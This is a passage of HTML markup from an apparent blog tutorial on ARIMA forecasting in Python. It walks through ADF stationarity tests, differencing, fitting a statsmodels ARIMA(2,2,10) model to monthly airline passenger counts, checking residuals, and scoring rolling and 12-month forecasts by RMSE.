experimenting with the ranges 1 &amp;lt;  = &lt;em&gt;p&lt;/em&gt; &amp;lt;  = 3 and
5 &amp;lt;  = &lt;em&gt;q&lt;/em&gt; &amp;lt;  = 15 (we’ll not worry about this here).&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;d&lt;/em&gt; parameter controls the amount of differencing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;d&lt;/em&gt; = 1 means we take the difference between every observation and the
previous observation.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;d&lt;/em&gt; = 2 means we difference the differenced time series again.&lt;/li&gt;
&lt;li&gt;… and so on.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The process should continue until the non-stationary trend is regarded
as statistically insignificant. This can be done by eye, but a better
way is to use the Augmented Dickey-Fuller (ADF) test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.stattools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; adfuller
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(y)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (0.8153688792060528, 0.9918802434376411, 13, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 996.6929308390189)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first two values returned give us the test statistic and &lt;em&gt;p&lt;/em&gt;-value
for the null hypothesis, respectively. We also get the critical value
cutoffs at the 1%, 5% and 10% levels. Without going into too much
detail, the general rule is that if the test statistic is greater than
the 5% cutoff then the null hypothesis is accepted, meaning that the
trend is non-stationary.&lt;/p&gt;
&lt;p&gt;In our case we should consider differencing the data and trying again.
Let’s use the &lt;code&gt;diff()&lt;/code&gt; function from &lt;code&gt;statsmodels&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Taking a single difference results in a test statistic that is
comparable to the 5% cutoff:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.statespace.tools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diff
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(diff(y))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (-2.829266824169999, 0.05421329028382552, 12, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 988.5069317854084)
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Taking a second difference results in a test statistic that is much
lower than even the 1% cutoff:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.statespace.tools&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diff
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adfuller(diff(y, k_diff&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## (-16.38423154246854, 2.7328918500140445e-29, 11, 130, {'1%': -3.4816817173418295, '5%': -2.8840418343195267, '10%': -2.578770059171598}, 988.6020417275605)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We see that a second order difference (&lt;em&gt;d&lt;/em&gt; = 2) produces a stationary
trend according to the ADF test. It is important to avoid excessively
high choices of &lt;em&gt;d&lt;/em&gt; since this can introduce artefacts in the final
model. So in practice it would be worth experimenting with both &lt;em&gt;d&lt;/em&gt; = 1
and &lt;em&gt;d&lt;/em&gt; = 2.&lt;/p&gt;
&lt;p&gt;What about the seasonal trend in the data? This suggests that we should
really be using the SARIMA framework (where the S stands for
“seasonal”). That would involve twice the number of parameters, so let’s
proceed with our simplified model and see how we get on.&lt;/p&gt;
&lt;h3 id="model-fitting"&gt;Model fitting&lt;/h3&gt;
&lt;p&gt;Having analysed the time series we have arrived at a reasonable choice
of our parameters: (&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;) = (2, 2, 10). As stated above, in
practice we should really test a range of values but for now we will not
worry.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;statsmodels&lt;/code&gt; library provides an &lt;code&gt;ARIMA&lt;/code&gt; object for model fitting
and forecasting. Let’s call it with our parameter choices:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;statsmodels.tsa.arima.model&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ARIMA
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(y, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can inspect the model using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;summary()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;lt;class 'statsmodels.iolib.summary.Summary'&amp;gt;
## &amp;quot;&amp;quot;&amp;quot;
## SARIMAX Results
## ==============================================================================
## Dep. Variable: passengers No. Observations: 144
## Model: ARIMA(2, 2, 10) Log Likelihood -673.434
## Date: Wed, 27 Aug 2025 AIC 1372.867
## Time: 14:21:20 BIC 1411.293
## Sample: 0 HQIC 1388.482
## - 144
## Covariance Type: opg
## ==============================================================================
## coef std err z P&amp;gt;|z| [0.025 0.975]
## ------------------------------------------------------------------------------
## ar.L1 0.0376 0.027 1.386 0.166 -0.016 0.091
## ar.L2 -0.9770 0.026 -37.090 0.000 -1.029 -0.925
## ma.L1 -0.4439 153.608 -0.003 0.998 -301.510 300.622
## ma.L2 0.9971 142.058 0.007 0.994 -277.432 279.426
## ma.L3 -0.4440 90.869 -0.005 0.996 -178.543 177.655
## ma.L4 0.2001 163.089 0.001 0.999 -319.449 319.849
## ma.L5 -0.2122 163.925 -0.001 0.999 -321.499 321.075
## ma.L6 0.2396 165.114 0.001 0.999 -323.377 323.857
## ma.L7 -0.0025 79.453 -3.19e-05 1.000 -155.728 155.723
## ma.L8 -0.6393 156.926 -0.004 0.997 -308.208 306.930
## ma.L9 0.1965 136.829 0.001 0.999 -267.984 268.377
## ma.L10 -0.8908 0.125 -7.104 0.000 -1.137 -0.645
## sigma2 660.0238 1.030 640.771 0.000 658.005 662.043
## ===================================================================================
## Ljung-Box (L1) (Q): 0.42 Jarque-Bera (JB): 10.61
## Prob(Q): 0.52 Prob(JB): 0.00
## Heteroskedasticity (H): 6.53 Skew: 0.08
## Prob(H) (two-sided): 0.00 Kurtosis: 4.33
## ===================================================================================
##
## Warnings:
## [1] Covariance matrix calculated using the outer product of gradients (complex-step).
## [2] Covariance matrix is singular or near-singular, with condition number 1.78e+22. Standard errors may be unstable.
## &amp;quot;&amp;quot;&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The summary of the fit provides the log likelihood, AIC and BIC metrics.
If you’re testing different choices of the (&lt;em&gt;p&lt;/em&gt;, &lt;em&gt;d&lt;/em&gt;, &lt;em&gt;q&lt;/em&gt;) parameters
it’s worth comparing the AIC and BIC metrics (lower values suggest a
better fit).&lt;/p&gt;
&lt;p&gt;The model summary also includes a couple of warnings, in this case
concerning the covariance matrix. We will not worry about these messages
for now, and inspect model residuals and forecasting ability as a way of
assessing the quality of the fit.&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;pandas&lt;/code&gt; we can inspect the residuals:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;resid)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;describe()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## 0
## count 144.000000
## mean 0.489740
## std 28.441220
## min -91.170547
## 25% -14.729881
## 50% -0.702994
## 75% 16.190037
## max 112.000000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The residuals appear to be distributed close to zero.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(kind&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;kde&amp;#34;&lt;/span&gt;, legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;residuals&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/kde-9.png" alt="Kernel density estimation plot showing how the ARIMA model residuals are distributed. We observe a symmetrical distribution that is centred close to value 0." /&gt;
&lt;p&gt;We can also plot the residuals over time to inspect the outliers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;residuals&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;hlines(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;144&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;residuals&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/residuals-11.png" alt="Plot showing the ARIMA model residuals plotted against time. We observe a fluctuating trend which appears random, that is centred on the horizontal zero line. Most of the residuals are within -50 and +50." /&gt;
&lt;p&gt;For an initial model this appears reasonable.&lt;/p&gt;
&lt;h3 id="forecasting"&gt;Forecasting&lt;/h3&gt;
&lt;p&gt;Now that we have a model we can try forecasting future time points.
There are a number of possible use cases:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We may only be interested in forecasting the next month. We can
simulate this with our data set by using a “rolling forecast” where
the model is retrained on all of the data up to the current time
point before predicting the next time point.&lt;/li&gt;
&lt;li&gt;The model could also be used for quarterly or yearly forecasting,
where we predict multiple future time points at once.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let’s go with approach 1 first. We will start by splitting the time
series into an initial training set and a hold-out test set:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y_values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(y&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train, test &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_values[:&lt;span style="color:#a5d6ff"&gt;96&lt;/span&gt;], y_values[&lt;span style="color:#a5d6ff"&gt;96&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;132&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Since time series models are typically used to forecast into the future,
a common practice for testing is to remove the end of the time series
from the training set and hold it out for testing. Here we have set
aside 3 years of data for testing.&lt;/p&gt;
&lt;p&gt;We will now simulate 3 years worth of monthly forecasting, where every
month we retrain the model with the latest data and produce a forecast
for the next month. Forecasts are produced using the &lt;code&gt;.forecast()&lt;/code&gt;
method, which predicts the next time point by default.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;predictions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;current_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; range(len(test)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(train, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(start_params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;current_params)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; current_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;params &lt;span style="color:#8b949e;font-style:italic"&gt;# update the parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;forecast()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; predictions&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(output[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]) &lt;span style="color:#8b949e;font-style:italic"&gt;# store the prediction&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; train&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(test[i]) &lt;span style="color:#8b949e;font-style:italic"&gt;# update the training set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Depending on the model complexity this can take a few minutes to run
(the above code chunk took 1-2 minutes). To save some optimisation time,
at every time step we have used the best-fit parameters produced for the
previous model as the starting parameters for the next model (using the
&lt;code&gt;start_params&lt;/code&gt; argument).&lt;/p&gt;
&lt;p&gt;We now have a list of predictions to compare against our test
observations. Let’s plot these together and compute the
root-mean-squared error (RMSE):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.metrics&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; mean_squared_error
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rmse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sqrt(mean_squared_error(test, predictions))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;RMSE: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;rmse&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## RMSE: 30.875187739583858
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(test, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;observed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(predictions, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ARIMA&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;legend()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/rolling-13.png" alt="Plot showing the passengers time series for three years of monthly data. The observed time series is plotted in blue and the ARIMA rolling predictions are plotted in red. The predictions appear to align closely with the observations and capture the seasonal pattern." /&gt;
&lt;p&gt;The agreement looks reasonable.&lt;/p&gt;
&lt;p&gt;Alternatively, we may want to predict all 12 months in the next year.
Let’s use the final 12 months of data (which were left out of the above
analysis):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_values[&lt;span style="color:#a5d6ff"&gt;132&lt;/span&gt;:]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We now retrain the model on the first 11 years worth of data and this
time use it to forecast the next 12 months:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ARIMA(train, order&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; model_fit&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;forecast(steps&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# predict 12 time points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;predictions &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; output[:&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;] &lt;span style="color:#8b949e;font-style:italic"&gt;# store the predictions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s compare the predictions with the test observations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rmse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sqrt(mean_squared_error(test, predictions))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;RMSE: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;rmse&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## RMSE: 73.86518520797583
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
